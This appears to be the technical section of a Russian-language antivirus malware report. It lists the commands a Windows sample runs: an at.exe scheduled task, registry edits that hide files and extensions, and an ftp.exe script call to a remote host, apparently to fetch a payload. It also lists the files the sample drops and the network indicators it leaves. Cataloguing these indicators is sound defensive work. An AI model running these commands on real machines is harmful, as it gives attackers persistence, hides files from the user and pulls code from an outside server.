Техническая информация
- %WINDIR%\Tasks\SA.DAT
- [<HKLM>\SYSTEM\ControlSet001\Services\Schedule] 'Start' = '00000002'
- скрытых файлов
- расширений файлов
- <SYSTEM32>\at.exe /?
- <SYSTEM32>\at.exe 20:21 cmd /c "<SYSTEM32>\jan.bat"
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
- <SYSTEM32>\sc.exe start schedule
- <SYSTEM32>\sc.exe config schedule start= auto
- <SYSTEM32>\ftp.exe -s:<SYSTEM32>\alvsvc.dll ip993-3.3322.org
- <SYSTEM32>\net1.exe start schedule
- <SYSTEM32>\cmd.exe /c <SYSTEM32>\jan100.bat
- <SYSTEM32>\winhfttp.dll
- <SYSTEM32>\at.bat
- <SYSTEM32>\systemll.txt
- <SYSTEM32>\jan100.bat
- <SYSTEM32>\jan.bat
- <SYSTEM32>\alvsvc.dll
- 'localhost':1037
- 'ip####3.3322.org':21
- DNS ASK ip####3.3322.org